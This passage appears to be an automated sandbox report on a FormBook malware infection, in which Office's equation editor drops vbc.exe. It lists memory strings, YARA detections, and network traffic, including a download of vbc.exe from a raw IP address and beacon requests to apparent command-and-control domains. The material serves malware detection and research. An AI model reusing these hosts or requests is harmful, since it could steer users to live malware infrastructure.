Source: explorer.exe, 00000006.00000000.481998120.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.491836650.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.549285741.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.481684893.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.477587804.0000000008428000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.484199032.00000000083DF000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.489856229.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.549510862.000000000460B000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.471223899.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.472862187.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.553074329.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.553133619.00000000083DF000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.481998120.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.477587804.0000000008428000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.484199032.00000000083DF000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.549510862.000000000460B000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.472862187.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.553133619.00000000083DF000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.491836650.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.553074329.0000000008374000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.470109547.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: wscript.exe, 00000007.00000002.669854680.0000000002E02000.00000004.00020000.sdmp String found in binary or memory: https://credit-b2b.mn.co//ecaq/?z6BXjz6=bfQv/FP2vMWCXJ5
Source: explorer.exe, 00000006.00000000.485841855.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.468574082.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.545212221.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.485841855.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.468574082.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.545212221.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.485841855.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.468574082.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.545212221.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D9815DB5.emf Jump to behavior
Source: unknown DNS traffic detected: queries for: www.14d7.com
Source: global traffic HTTP traffic detected: GET /981900000_2/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.167.92.57Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ecaq/?k0Dli=0bA4dpDh3xCt&z6BXjz6=+tTxZdgcqU79mMd7wf6ovAKHVoLw/EhrDF3C/ckFTtMjuwl+tr3xRs8m7m6dFdAioc4v8g== HTTP/1.1Host: www.14d7.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ecaq/?k0Dli=0bA4dpDh3xCt&z6BXjz6=4YbOQk8AO0vy4k2VmRJxI3NcMocUM9+uNZ05HSgMgTndh1RwRX9NSBB2ccr9KRceRZRXnw== HTTP/1.1Host: www.gzz06j.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ecaq/?z6BXjz6=qIaOAylHD+7nuLCKVj0dqMEagOlqUztLhCHwuYmgFKo0pBs1u2Qf4sHa5T8Epw0dehH0mQ==&k0Dli=0bA4dpDh3xCt HTTP/1.1Host: www.flagimir.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ecaq/?k0Dli=0bA4dpDh3xCt&z6BXjz6=Auz5euyZ0mn/RqJ0JcD8xijjXrO6gdmIQxpKfZB0kleOtIEmrjANtIGBIbrQdiyKeV2Adg== HTTP/1.1Host: www.trendyhunterr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboard
Source: C:\Users\Public\vbc.exe Code function: 4_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 4_2_00404E07

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.490000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.490000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.500496726.0000000000390000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.668009363.00000000000D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.667963652.0000000000070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.492702725.0000000009521000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.500520778.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.465010380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.500610869.0000000000820000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.465677095.0000000000490000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000001.465359604.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.485058006.0000000009521000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.464491442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.668043028.0000000000140000.00000004.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.490000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.490000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.490000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.490000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.500496726.0000000000390000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.500496726.0000000000390000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.668009363.00000000000D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.668009363.00000000000D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.667963652.0000000000070000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.667963652.0000000000070000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.492702725.0000000009521000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.492702725.0000000009521000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.500520778.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.500520778.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.465010380.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.465010380.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.500610869.0000000000820000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.500610869.0000000000820000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.465677095.0000000000490000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.465677095.0000000000490000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000001.465359604.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000001.465359604.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.485058006.0000000009521000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.485058006.0000000009521000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.464491442.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.464491442.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.668043028.0000000000140000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.668043028.0000000000140000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Yara signature match
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.490000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.490000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.490000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.490000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.500496726.0000000000390000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.500496726.0000000000390000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.668009363.00000000000D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.668009363.00000000000D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.667963652.0000000000070000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.667963652.0000000000070000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.492702725.0000000009521000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.492702725.0000000009521000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.500520778.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.500520778.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.465010380.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.465010380.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.500610869.0000000000820000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.500610869.0000000000820000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.465677095.0000000000490000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.465677095.0000000000490000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000001.465359604.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000001.465359604.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.485058006.0000000009521000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.485058006.0000000009521000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
